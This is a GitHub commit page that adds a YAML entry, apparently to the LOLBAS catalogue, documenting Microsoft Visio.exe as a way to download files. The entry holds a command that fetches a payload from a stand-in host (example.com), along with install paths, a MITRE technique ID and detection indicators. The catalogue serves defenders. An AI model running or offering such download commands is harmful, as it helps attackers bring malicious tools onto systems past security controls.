Skip to content

Commit 35148cc

Browse files
avihayeldadwietze
andauthored
Add Visio.exe as a downloader (#356)
Co-authored-by: Wietze <[email protected]>
1 parent 622aaee commit 35148cc

File tree

1 file changed

+34
-0
lines changed

1 file changed

+34
-0
lines changed

yml/OtherMSBinaries/Visio.yml

Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
---
2+
Name: Visio.exe
3+
Description: Microsoft Visio Executable
4+
Author: Avihay Eldad
5+
Created: 2024-02-15
6+
Commands:
7+
- Command: Visio.exe https://example.com/payload
8+
Description: Downloads payload from remote server
9+
Usecase: It will download a remote payload and place it in INetCache.
10+
Category: Download
11+
Privileges: User
12+
MitreID: T1105
13+
OperatingSystem: Windows
14+
Tags:
15+
- Download: INetCache
16+
Full_Path:
17+
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Visio.exe
18+
- Path: C:\Program Files\Microsoft Office\Office14\Visio.exe
19+
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Visio.exe
20+
- Path: C:\Program Files\Microsoft Office\Office15\Visio.exe
21+
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Visio.exe
22+
- Path: C:\Program Files\Microsoft Office\Office16\Visio.exe
23+
- Path: C:\Program Files (x86)\Microsoft Office\root\Office14\Visio.exe
24+
- Path: C:\Program Files\Microsoft Office\root\Office14\Visio.exe
25+
- Path: C:\Program Files (x86)\Microsoft Office\root\Office15\Visio.exe
26+
- Path: C:\Program Files\Microsoft Office\root\Office15\Visio.exe
27+
- Path: C:\Program Files (x86)\Microsoft Office\root\Office16\Visio.exe
28+
- Path: C:\Program Files\Microsoft Office\root\Office16\Visio.exe
29+
Detection:
30+
- IOC: URL on a visio.exe command line
31+
- IOC: visio.exe making unexpected network connections or DNS requests
32+
Acknowledgement:
33+
- Person: Avihay Eldad
34+
Handle: '@AvihayEldad'

0 commit comments

Comments
 (0)